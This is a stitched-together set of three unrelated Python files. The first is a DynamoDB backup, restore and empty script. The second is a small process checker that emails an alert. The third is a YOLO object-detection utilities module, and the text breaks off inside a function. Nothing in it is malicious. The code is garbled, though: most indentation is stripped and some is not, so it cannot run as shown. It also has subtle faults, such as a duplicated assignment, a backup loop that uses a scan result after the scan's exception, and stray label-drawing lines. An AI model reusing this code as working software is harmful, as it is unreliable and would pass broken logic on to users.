table_desc = table_data["Table"]
table_attribute_definitions = table_desc["AttributeDefinitions"]
table_key_schema = table_desc["KeySchema"]
original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")
optional_args = {}
if billing_mode == "PROVISIONED":
table_provisioned_throughput = {
"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity),
}
optional_args["ProvisionedThroughput"] = table_provisioned_throughput
if table_local_secondary_indexes is not None:
optional_args["LocalSecondaryIndexes"] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args["GlobalSecondaryIndexes"] = table_global_secondary_indexes
table_provisioned_throughput = {
"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity),
}
logging.info("Deleting Table " + table_name)
delete_table(dynamo, sleep_interval, table_name)
logging.info("Creating Table " + table_name)
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_name,
KeySchema=table_key_schema,
BillingMode=billing_mode,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info("Limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying creation of "
+ table_name
+ ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, table_name, "created")
logging.info(
"Recreation of "
+ table_name
+ " completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
def do_backup(dynamo, read_capacity, tableQueue=None, srcTable=None):
"""
Connect to DynamoDB and perform the backup for srcTable or each table in tableQueue
"""
if srcTable:
table_name = srcTable
if tableQueue:
while True:
table_name = tableQueue.get()
if table_name is None:
break
logging.info("Starting backup for " + table_name + "..")
# trash data, re-create subdir
if os.path.exists(args.dumpPath + os.sep + table_name):
shutil.rmtree(args.dumpPath + os.sep + table_name)
mkdir_p(args.dumpPath + os.sep + table_name)
# get table schema
logging.info("Dumping table schema for " + table_name)
f = open(args.dumpPath + os.sep + table_name + os.sep + SCHEMA_FILE, "w+")
table_desc = dynamo.describe_table(TableName=table_name)
f.write(json.dumps(table_desc, indent=JSON_INDENT))
f.close()
if not args.schemaOnly:
original_read_capacity = table_desc["Table"]["ProvisionedThroughput"][
"ReadCapacityUnits"
]
original_write_capacity = table_desc["Table"]["ProvisionedThroughput"][
"WriteCapacityUnits"
]
# override table read capacity if specified
if (
read_capacity is not None
and read_capacity != original_read_capacity
):
update_provisioned_throughput(
dynamo, table_name, read_capacity, original_write_capacity
)
# get table data
logging.info("Dumping table items for " + table_name)
mkdir_p(args.dumpPath + os.sep + table_name + os.sep + DATA_DIR)
i = 1
last_evaluated_key = None
while True:
try:
optional_args = {}
if last_evaluated_key is not None:
optional_args["ExclusiveStartKey"] = last_evaluated_key
scanned_table = dynamo.scan(
TableName=table_name, **optional_args
)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.error(
"EXCEEDED THROUGHPUT ON TABLE "
+ table_name
+ ". BACKUP FOR IT IS USELESS."
)
tableQueue.task_done()
f = open(
args.dumpPath
+ os.sep
+ table_name
+ os.sep
+ DATA_DIR
+ os.sep
+ str(i).zfill(4)
+ ".json",
"w+",
)
del scanned_table["ResponseMetadata"]
f.write(json.dumps(scanned_table, indent=JSON_INDENT))
f.close()
i += 1
try:
last_evaluated_key = scanned_table["LastEvaluatedKey"]
except KeyError:
break
# revert back to original table read capacity if specified
if (
read_capacity is not None
and read_capacity != original_read_capacity
):
update_provisioned_throughput(
dynamo,
table_name,
original_read_capacity,
original_write_capacity,
False,
)
logging.info(
"Backup for "
+ table_name
+ " table completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
tableQueue.task_done()
def prepare_provisioned_throughput_for_restore(provisioned_throughput):
"""
This function makes sure that the payload returned for the boto3 API call create_table is compatible
with the provisioned throughput attribute
See: https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html
"""
return {
"ReadCapacityUnits": provisioned_throughput["ReadCapacityUnits"],
"WriteCapacityUnits": provisioned_throughput["WriteCapacityUnits"],
}
def prepare_gsi_for_restore(gsi):
"""
This function makes sure that the payload returned for the boto3 API call create_table is compatible
See: https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html
"""
return {
"IndexName": gsi["IndexName"],
"KeySchema": gsi["KeySchema"],
"Projection": gsi["Projection"],
"ProvisionedThroughput": prepare_provisioned_throughput_for_restore(
gsi["ProvisionedThroughput"]
),
}
def do_restore(
dynamo,
sleep_interval,
source_table,
destination_table,
write_capacity,
billing_mode,
):
"""
Restore table
"""
logging.info(
"Starting restore for " + source_table + " to " + destination_table + ".."
)
# create table using schema
# restore source_table from dump directory if it exists else try current working directory
if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
dump_data_path = args.dumpPath
else:
logging.info(
'Cannot find "./%s/%s", Now trying current working directory..'
% (args.dumpPath, source_table)
)
if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
dump_data_path = CURRENT_WORKING_DIR
else:
logging.info(
'Cannot find "%s/%s" directory containing dump files!'
% (CURRENT_WORKING_DIR, source_table)
)
sys.exit(1)
table_data = json.load(
open(dump_data_path + os.sep + source_table + os.sep + SCHEMA_FILE)
)
table = table_data["Table"]
table_attribute_definitions = table["AttributeDefinitions"]
table_table_name = destination_table
table_key_schema = table["KeySchema"]
original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")
# override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
if write_capacity is None:
if original_write_capacity < RESTORE_WRITE_CAPACITY:
write_capacity = RESTORE_WRITE_CAPACITY
else:
write_capacity = original_write_capacity
if original_write_capacity == 0:
original_write_capacity = RESTORE_WRITE_CAPACITY
# ensure that read capacity is at least RESTORE_READ_CAPACITY
if original_read_capacity < RESTORE_READ_CAPACITY:
        read_capacity = RESTORE_READ_CAPACITY
else:
read_capacity = original_read_capacity
if original_read_capacity == 0:
original_read_capacity = RESTORE_READ_CAPACITY
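    # Example (illustrative): a table dumped with a write capacity of 5 is restored with the
    # temporary RESTORE_WRITE_CAPACITY of 25, while one dumped with 100 keeps 100.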
# override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
original_gsi_write_capacities = []
original_gsi_read_capacities = []
if table_global_secondary_indexes is not None:
for gsi in table_global_secondary_indexes:
# keeps track of original gsi write capacity units. If provisioned capacity is 0, set to
# RESTORE_WRITE_CAPACITY as fallback given that 0 is not allowed for write capacities
original_gsi_write_capacity = gsi["ProvisionedThroughput"][
"WriteCapacityUnits"
]
if original_gsi_write_capacity == 0:
original_gsi_write_capacity = RESTORE_WRITE_CAPACITY
original_gsi_write_capacities.append(original_gsi_write_capacity)
if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)
# keeps track of original gsi read capacity units. If provisioned capacity is 0, set to
# RESTORE_READ_CAPACITY as fallback given that 0 is not allowed for read capacities
original_gsi_read_capacity = gsi["ProvisionedThroughput"][
"ReadCapacityUnits"
]
if original_gsi_read_capacity == 0:
original_gsi_read_capacity = RESTORE_READ_CAPACITY
original_gsi_read_capacities.append(original_gsi_read_capacity)
if (
gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
< RESTORE_READ_CAPACITY
):
gsi["ProvisionedThroughput"][
"ReadCapacityUnits"
] = RESTORE_READ_CAPACITY
# temp provisioned throughput for restore
table_provisioned_throughput = {
"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity),
}
optional_args = {}
if billing_mode == "PROVISIONED":
optional_args["ProvisionedThroughput"] = table_provisioned_throughput
if not args.dataOnly:
logging.info(
"Creating "
+ destination_table
+ " table with temp write capacity of "
+ str(write_capacity)
)
if table_local_secondary_indexes is not None:
optional_args["LocalSecondaryIndexes"] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args["GlobalSecondaryIndexes"] = [
prepare_gsi_for_restore(gsi) for gsi in table_global_secondary_indexes
]
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_table_name,
KeySchema=table_key_schema,
BillingMode=billing_mode,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying creation of " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, "
"retrying creation of " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, destination_table, "created")
elif not args.skipThroughputUpdate:
# update provisioned capacity
if int(write_capacity) > original_write_capacity:
update_provisioned_throughput(
dynamo, destination_table, original_read_capacity, write_capacity, False
)
if not args.schemaOnly:
# read data files
logging.info("Restoring data for " + destination_table + " table..")
data_file_list = os.listdir(
dump_data_path + os.sep + source_table + os.sep + DATA_DIR + os.sep
)
data_file_list.sort()
for data_file in data_file_list:
logging.info("Processing " + data_file + " of " + destination_table)
items = []
item_data = json.load(
open(
dump_data_path
+ os.sep
+ source_table
+ os.sep
+ DATA_DIR
+ os.sep
+ data_file
)
)
items.extend(item_data["Items"])
# batch write data
put_requests = []
while len(items) > 0:
put_requests.append({"PutRequest": {"Item": items.pop(0)}})
# flush every MAX_BATCH_WRITE
if len(put_requests) == MAX_BATCH_WRITE:
logging.debug(
"Writing next "
+ str(MAX_BATCH_WRITE)
+ " items to "
+ destination_table
+ ".."
)
batch_write(
dynamo,
BATCH_WRITE_SLEEP_INTERVAL,
destination_table,
put_requests,
)
del put_requests[:]
# flush remainder
if len(put_requests) > 0:
batch_write(
dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests
)
if not args.skipThroughputUpdate:
# revert to original table write capacity if it has been modified
if (
int(write_capacity) != original_write_capacity
or int(read_capacity) != original_read_capacity
):
update_provisioned_throughput(
dynamo,
destination_table,
original_read_capacity,
original_write_capacity,
False,
)
# loop through each GSI to check if it has changed and update if necessary
if table_global_secondary_indexes is not None:
gsi_data = []
for gsi in table_global_secondary_indexes:
wcu = gsi["ProvisionedThroughput"]["WriteCapacityUnits"]
rcu = gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
original_gsi_read_capacity = original_gsi_read_capacities.pop(0)
if (
original_gsi_write_capacity != wcu
or original_gsi_read_capacity != rcu
):
gsi_data.append(
{
"Update": {
"IndexName": gsi["IndexName"],
"ProvisionedThroughput": {
"ReadCapacityUnits": int(
original_gsi_read_capacity
),
"WriteCapacityUnits": int(
original_gsi_write_capacity
),
},
}
}
)
if gsi_data:
logging.info(
"Updating "
+ destination_table
+ " global secondary indexes write and read capacities as necessary.."
)
while True:
try:
dynamo.update_table(
TableName=destination_table,
GlobalSecondaryIndexUpdates=gsi_data,
)
break
except dynamo.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + ".."
)
time.sleep(sleep_interval)
# wait for table to become active
wait_for_active_table(dynamo, destination_table, "active")
logging.info(
"Restore for "
+ source_table
+ " to "
+ destination_table
+ " table completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
else:
logging.info(
"Empty schema of "
+ source_table
+ " table created. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
def main():
"""
Entrypoint to the script
"""
global args, sleep_interval, start_time
# parse args
parser = argparse.ArgumentParser(
description="Simple DynamoDB backup/restore/empty."
)
parser.add_argument(
"-a",
"--archive",
help="Type of compressed archive to create." "If unset, don't create archive",
choices=["zip", "tar"],
)
parser.add_argument(
"-b",
"--bucket",
help="S3 bucket in which to store or retrieve backups." "[must already exist]",
)
parser.add_argument(
"-m",
"--mode",
help="Operation to perform",
choices=["backup", "restore", "empty"],
)
parser.add_argument(
"-r",
"--region",
help="AWS region to use, e.g. 'us-west-1'. "
"Can use AWS_DEFAULT_REGION for local testing. Use '"
+ LOCAL_REGION
+ "' for local DynamoDB testing",
)
parser.add_argument(
"--host", help="Host of local DynamoDB [required only for local]"
)
parser.add_argument(
"--port", help="Port of local DynamoDB [required only for local]"
)
parser.add_argument(
"--accessKey", help="Access key of local DynamoDB " "[required only for local]"
)
parser.add_argument(
"--secretKey", help="Secret key of local DynamoDB " "[required only for local]"
)
parser.add_argument(
"-p",
"--profile",
help="AWS credentials file profile to use. Allows you to use a "
"profile instead accessKey, secretKey authentication",
)
parser.add_argument(
"-s",
"--srcTable",
help="Source DynamoDB table name to backup or restore from, "
"use 'tablename*' for wildcard prefix selection or '*' for "
"all tables. Mutually exclusive with --tag",
)
parser.add_argument(
"-d",
"--destTable",
help="Destination DynamoDB table name to backup or restore to, "
"use 'tablename*' for wildcard prefix selection "
"(defaults to use '-' separator) [optional, defaults to source]",
)
parser.add_argument(
"--prefixSeparator",
help="Specify a different prefix separator, " "e.g. '.' [optional]",
)
parser.add_argument(
"--noSeparator",
action="store_true",
help="Overrides the use of a prefix separator for backup wildcard "
"searches [optional]",
)
parser.add_argument(
"--readCapacity",
help="Change the temp read capacity of the DynamoDB table to backup "
"from [optional]",
)
parser.add_argument(
"-t",
"--tag",
help="Tag to use for identifying tables to back up. "
"Mutually exclusive with srcTable. Provided as KEY=VALUE",
)
parser.add_argument(
"--writeCapacity",
help="Change the temp write capacity of the DynamoDB table to restore "
"to [defaults to " + str(RESTORE_WRITE_CAPACITY) + ", optional]",
)
parser.add_argument(
"--schemaOnly",
action="store_true",
default=False,
help="Backup or restore the schema only. Do not backup/restore data. "
"Can be used with both backup and restore modes. Cannot be used with "
"the --dataOnly [optional]",
)
parser.add_argument(
"--dataOnly",
action="store_true",
default=False,
help="Restore data only. Do not delete/recreate schema [optional for "
"restore]",
)
parser.add_argument(
"--noConfirm",
action="store_true",
default=False,
help="Don't ask for confirmation before deleting existing schemas.",
)
parser.add_argument(
"--skipThroughputUpdate",
action="store_true",
default=False,
help="Skip updating throughput values across tables [optional]",
)
parser.add_argument(
"--dumpPath",
help="Directory to place and search for DynamoDB table "
"backups (defaults to use '" + str(DATA_DUMP) + "') [optional]",
default=str(DATA_DUMP),
)
    parser.add_argument(
        "--billingMode",
        help="Set billing mode between PROVISIONED|PAY_PER_REQUEST "
        "(defaults to use '" + str(BILLING_MODE) + "') [optional]",
        choices=["PROVISIONED", "PAY_PER_REQUEST"],
        default=str(BILLING_MODE),
    )
parser.add_argument(
"--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL " "[optional]"
)
args = parser.parse_args()
# set log level
log_level = LOG_LEVEL
if args.log is not None:
log_level = args.log.upper()
logging.basicConfig(level=getattr(logging, log_level))
# Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
if args.schemaOnly and args.dataOnly:
logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
sys.exit(1)
# instantiate connection
if args.region == LOCAL_REGION:
conn = _get_aws_client(
service="dynamodb",
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
)
sleep_interval = LOCAL_SLEEP_INTERVAL
else:
if not args.profile:
conn = _get_aws_client(
service="dynamodb",
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
else:
conn = _get_aws_client(
service="dynamodb",
profile=args.profile,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
# don't proceed if connection is not established
if not conn:
logging.info("Unable to establish connection with dynamodb")
sys.exit(1)
# set prefix separator
prefix_separator = DEFAULT_PREFIX_SEPARATOR
if args.prefixSeparator is not None:
prefix_separator = args.prefixSeparator
if args.noSeparator is True:
prefix_separator = None
# do backup/restore
start_time = datetime.datetime.now().replace(microsecond=0)
if args.mode == "backup":
matching_backup_tables = []
if args.tag:
            # Use Boto3 to find tags. Boto3 provides a paginator that makes searching
            # through all tables for the tag easier
matching_backup_tables = get_table_name_by_tag(
args.profile, args.region, args.tag
)
elif args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(
conn, args.srcTable, prefix_separator
)
elif args.srcTable:
matching_backup_tables.append(args.srcTable)
if len(matching_backup_tables) == 0:
logging.info("No matching tables found. Nothing to do.")
sys.exit(0)
else:
logging.info(
"Found "
+ str(len(matching_backup_tables))
+ " table(s) in DynamoDB host to backup: "
+ ", ".join(matching_backup_tables)
)
        # single explicit table: back it up directly in this thread
        if args.srcTable and args.srcTable.find("*") == -1:
            do_backup(conn, args.readCapacity, srcTable=args.srcTable)
        else:
            # wildcard or --tag backups are spread across a pool of worker threads
            q = Queue()
threads = []
for i in range(MAX_NUMBER_BACKUP_WORKERS):
t = threading.Thread(
target=do_backup,
args=(conn, args.readCapacity),
kwargs={"tableQueue": q},
)
t.start()
threads.append(t)
time.sleep(THREAD_START_DELAY)
for table in matching_backup_tables:
q.put(table)
q.join()
for i in range(MAX_NUMBER_BACKUP_WORKERS):
q.put(None)
for t in threads:
t.join()
try:
logging.info("Backup of table(s) " + args.srcTable + " completed!")
except (NameError, TypeError):
logging.info(
"Backup of table(s) "
+ ", ".join(matching_backup_tables)
+ " completed!"
)
if args.archive:
if args.tag:
for table in matching_backup_tables:
dump_path = args.dumpPath + os.sep + table
did_archive, archive_file = do_archive(args.archive, dump_path)
if args.bucket and did_archive:
do_put_bucket_object(
args.profile, args.region, args.bucket, archive_file
)
else:
did_archive, archive_file = do_archive(args.archive, args.dumpPath)
if args.bucket and did_archive:
do_put_bucket_object(
args.profile, args.region, args.bucket, archive_file
)
elif args.mode == "restore":
if args.destTable is not None:
dest_table = args.destTable
else:
dest_table = args.srcTable
# If backups are in S3 download and extract the backup to use during restoration
if args.bucket:
do_get_s3_archive(
args.profile, args.region, args.bucket, args.srcTable, args.archive
)
if dest_table.find("*") != -1:
matching_destination_tables = get_table_name_matches(
conn, dest_table, prefix_separator
)
delete_str = ": " if args.dataOnly else " to be deleted: "
logging.info(
"Found "
+ str(len(matching_destination_tables))
+ " table(s) in DynamoDB host"
+ delete_str
+ ", ".join(matching_destination_tables)
)
threads = []
for table in matching_destination_tables:
t = threading.Thread(
target=delete_table, args=(conn, sleep_interval, table)
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
matching_restore_tables = get_restore_table_matches(
args.srcTable, prefix_separator
)
logging.info(
"Found "
+ str(len(matching_restore_tables))
+ " table(s) in "
+ args.dumpPath
+ " to restore: "
+ ", ".join(matching_restore_tables)
)
threads = []
for source_table in matching_restore_tables:
if args.srcTable == "*":
t = threading.Thread(
target=do_restore,
args=(
conn,
sleep_interval,
source_table,
source_table,
args.writeCapacity,
args.billingMode,
),
)
else:
t = threading.Thread(
target=do_restore,
args=(
conn,
sleep_interval,
source_table,
change_prefix(
source_table,
args.srcTable,
dest_table,
prefix_separator,
),
args.writeCapacity,
args.billingMode,
),
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info(
"Restore of table(s) "
+ args.srcTable
+ " to "
+ dest_table
+ " completed!"
)
else:
delete_table(
conn=conn, sleep_interval=sleep_interval, table_name=dest_table
)
do_restore(
dynamo=conn,
sleep_interval=sleep_interval,
source_table=args.srcTable,
destination_table=dest_table,
write_capacity=args.writeCapacity,
billing_mode=args.billingMode,
)
elif args.mode == "empty":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(
conn, args.srcTable, prefix_separator
)
logging.info(
"Found "
+ str(len(matching_backup_tables))
+ " table(s) in DynamoDB host to empty: "
+ ", ".join(matching_backup_tables)
)
threads = []
for table in matching_backup_tables:
t = threading.Thread(
target=do_empty, args=(conn, table, args.billingMode)
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Empty of table(s) " + args.srcTable + " completed!")
else:
do_empty(conn, args.srcTable, args.billingMode)
if __name__ == "__main__":
main()
|
main.py
|
"""
.. createdby: Darren Zhao Xie on 3/19/2019
.. currentmodule:: process_checker.main
Check if the process is running at certain time.
"""
import os
from threading import Thread
from time import sleep
from datetime import datetime
from process_checker.notifiers import Email
CHECK_ITI_FILE_PATH = '/path/to/file1'
CHECK_IL_FILE_PATH = '/path/to/file2'
APP_PROCESS = 'process_name1'
PROCESS_TIME = 5
class ProcessChecker:
"""
Check if some process is running.
"""
def __init__(self, iti_last_modified=None, il_last_modified=None):
self.iti_modified_time = iti_last_modified
self.il_modified_time = il_last_modified
def run(self, process_name, process_time):
"""
        If it is the process time, the files have changed, and the process is not running, send a notification email.
:param process_name: the name of the application process
:param process_time: the time of the process expected to be running
:return:
"""
while True:
if not self.time_check(process_time):
# if distance >= 2, sleep 1 hour
if self.distance_hours(process_time) >= 2:
sleep(3600)
# if 2 > distance > 1, sleep 2 minutes
else:
sleep(120)
continue
elif not self.file_changed() or self.is_process_running(process_name):
continue
else:
Email().send(subject='ALERT: PROCESS NOT RUNNING ALERT',
body=f'{process_name} is not running by {process_time}')
# sleep 1 hour to avoid infinite email sending
sleep(3600)
@staticmethod
def time_check(process_time):
"""
        Check whether the current time is the process time; return True if so, else False.
:param process_time:
:return:
"""
now_hour = datetime.now().hour
if now_hour == process_time:
return True
return False
@staticmethod
def is_process_running(process_name):
"""
        Check whether the process is running; return True if so, else False.
:param process_name:
:return:
"""
current_processes = os.popen("ps -Af").read()
        if process_name in current_processes:
return True
return False
def file_changed(self):
"""
        Check the files' modification times; if either has changed, update the stored values and return True, else return False.
:return:
"""
changed = False
if os.path.exists(CHECK_ITI_FILE_PATH):
iti_last_modified = os.path.getmtime(CHECK_ITI_FILE_PATH)
if iti_last_modified != self.iti_modified_time:
self.iti_modified_time = iti_last_modified
changed = True
if os.path.exists(CHECK_IL_FILE_PATH):
il_last_modified = os.path.getmtime(CHECK_IL_FILE_PATH)
if il_last_modified != self.il_modified_time:
self.il_modified_time = il_last_modified
changed = True
return changed
@staticmethod
def distance_hours(process_time):
"""
        Return the number of hours from the current time until the process time, wrapping past midnight.
:return:
"""
now_hour = datetime.now().hour
distance = process_time - now_hour
return distance if distance > 0 else distance + 24
if __name__ == '__main__':
    thread = Thread(target=ProcessChecker().run, kwargs={'process_name': APP_PROCESS, 'process_time': PROCESS_TIME})
thread.start()
|
utils.py
|
#================================================================
#
# File name : utils.py
# Author : PyLessons
# Created date: 2020-09-27
# Website : https://pylessons.com/
# GitHub : https://github.com/pythonlessons/TensorFlow-2.x-YOLOv3
# Description : additional yolov3 and yolov4 functions
#
#================================================================
from multiprocessing import Process, Queue, Pipe
import cv2
import time
import random
import colorsys
import numpy as np
import tensorflow as tf
from yolov3.configs import *
from yolov3.yolov4 import *
from tensorflow.python.saved_model import tag_constants
def load_yolo_weights(model, weights_file):
tf.keras.backend.clear_session() # used to reset layer names
# load Darknet original weights to TensorFlow model
if YOLO_TYPE == "yolov3":
range1 = 75 if not TRAIN_YOLO_TINY else 13
range2 = [58, 66, 74] if not TRAIN_YOLO_TINY else [9, 12]
if YOLO_TYPE == "yolov4":
range1 = 110 if not TRAIN_YOLO_TINY else 21
range2 = [93, 101, 109] if not TRAIN_YOLO_TINY else [17, 20]
with open(weights_file, 'rb') as wf:
major, minor, revision, seen, _ = np.fromfile(wf, dtype=np.int32, count=5)
j = 0
for i in range(range1):
if i > 0:
conv_layer_name = 'conv2d_%d' %i
else:
conv_layer_name = 'conv2d'
if j > 0:
bn_layer_name = 'batch_normalization_%d' %j
else:
bn_layer_name = 'batch_normalization'
conv_layer = model.get_layer(conv_layer_name)
filters = conv_layer.filters
k_size = conv_layer.kernel_size[0]
in_dim = conv_layer.input_shape[-1]
if i not in range2:
# darknet weights: [beta, gamma, mean, variance]
bn_weights = np.fromfile(wf, dtype=np.float32, count=4 * filters)
# tf weights: [gamma, beta, mean, variance]
bn_weights = bn_weights.reshape((4, filters))[[1, 0, 2, 3]]
bn_layer = model.get_layer(bn_layer_name)
j += 1
else:
conv_bias = np.fromfile(wf, dtype=np.float32, count=filters)
# darknet shape (out_dim, in_dim, height, width)
conv_shape = (filters, in_dim, k_size, k_size)
conv_weights = np.fromfile(wf, dtype=np.float32, count=np.product(conv_shape))
# tf shape (height, width, in_dim, out_dim)
conv_weights = conv_weights.reshape(conv_shape).transpose([2, 3, 1, 0])
if i not in range2:
conv_layer.set_weights([conv_weights])
bn_layer.set_weights(bn_weights)
else:
conv_layer.set_weights([conv_weights, conv_bias])
assert len(wf.read()) == 0, 'failed to read all data'
def Load_Yolo_model():
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
print(f'GPUs {gpus}')
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: pass
if YOLO_FRAMEWORK == "tf": # TensorFlow detection
if YOLO_TYPE == "yolov4":
Darknet_weights = YOLO_V4_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V4_WEIGHTS
if YOLO_TYPE == "yolov3":
Darknet_weights = YOLO_V3_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V3_WEIGHTS
if YOLO_CUSTOM_WEIGHTS == False:
print("Loading Darknet_weights from:", Darknet_weights)
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=YOLO_COCO_CLASSES)
load_yolo_weights(yolo, Darknet_weights) # use Darknet weights
else:
checkpoint = f"./checkpoints/{TRAIN_MODEL_NAME}"
if TRAIN_YOLO_TINY:
checkpoint += "_Tiny"
print("Loading custom weights from:", checkpoint)
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=TRAIN_CLASSES)
yolo.load_weights(checkpoint) # use custom weights
elif YOLO_FRAMEWORK == "trt": # TensorRT detection
saved_model_loaded = tf.saved_model.load(YOLO_CUSTOM_WEIGHTS, tags=[tag_constants.SERVING])
signature_keys = list(saved_model_loaded.signatures.keys())
yolo = saved_model_loaded.signatures['serving_default']
return yolo
def image_preprocess(image, target_size, gt_boxes=None):
ih, iw = target_size
h, w, _ = image.shape
scale = min(iw/w, ih/h)
nw, nh = int(scale * w), int(scale * h)
image_resized = cv2.resize(image, (nw, nh))
image_paded = np.full(shape=[ih, iw, 3], fill_value=128.0)
dw, dh = (iw - nw) // 2, (ih-nh) // 2
image_paded[dh:nh+dh, dw:nw+dw, :] = image_resized
image_paded = image_paded / 255.
if gt_boxes is None:
return image_paded
else:
gt_boxes[:, [0, 2]] = gt_boxes[:, [0, 2]] * scale + dw
gt_boxes[:, [1, 3]] = gt_boxes[:, [1, 3]] * scale + dh
return image_paded, gt_boxes
def draw_bbox(image, bboxes, CLASSES=YOLO_COCO_CLASSES, show_label=True, show_confidence = True, Text_colors=(255,255,0), rectangle_colors='', tracking=False):
NUM_CLASS = read_class_names(CLASSES)
num_classes = len(NUM_CLASS)
image_h, image_w, _ = image.shape
hsv_tuples = [(1.0 * x / num_classes, 1., 1.) for x in range(num_classes)]
#print("hsv_tuples", hsv_tuples)
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
random.seed(0)
random.shuffle(colors)
random.seed(None)
for i, bbox in enumerate(bboxes):
coor = np.array(bbox[:4], dtype=np.int32)
score = bbox[4]
class_ind = int(bbox[5])
bbox_color = rectangle_colors if rectangle_colors != '' else colors[class_ind]
bbox_thick = int(0.6 * (image_h + image_w) / 1000)
if bbox_thick < 1: bbox_thick = 1
fontScale = 0.75 * bbox_thick
(x1, y1), (x2, y2) = (coor[0], coor[1]), (coor[2], coor[3])
# put object rectangle
cv2.rectangle(image, (x1, y1), (x2, y2), bbox_color, bbox_thick*2)
if show_label:
# get text label
score_str = " {:.2f}".format(score) if show_confidence else ""
if tracking: score_str = " "+str(score)
try:
label = "{}".format(NUM_CLASS[class_ind]) + score_str
except KeyError:
print("You received KeyError, this might be that you are trying to use yolo original weights")
print("while using custom classes, if using custom model in configs.py set YOLO_CUSTOM_WEIGHTS = True")
# get text size
(text_width, text_height), baseline = cv2.getTextSize(label, cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, thickness=bbox_thick)
# put filled text rectangle
cv2.rectangle(image, (x1, y1), (x1 + text_width, y1 - text_height - baseline), bbox_color, thickness=cv2.FILLED)
# put text above rectangle
cv2.putText(image, label, (x1, y1-4), cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, Text_colors, bbox_thick, lineType=cv2.LINE_AA)
ts = 0.9
cv2.putText(image, label, (10, 20 + int(ts*i)), cv2.FONT_HERSHEY_COMPLEX_SMALL,
ts, (0, 0, 0), bbox_thick, lineType=cv2.LINE_AA)
cv2.putText(image, label, (11, 21 + int(ts*i)), cv2.FONT_HERSHEY_COMPLEX_SMALL,
ts, (255, 255, 255), bbox_thick, lineType=cv2.LINE_AA)
return image
def bboxes_iou(boxes1, boxes2):
boxes1 = np.array(boxes1)
boxes2 = np.array(boxes2)
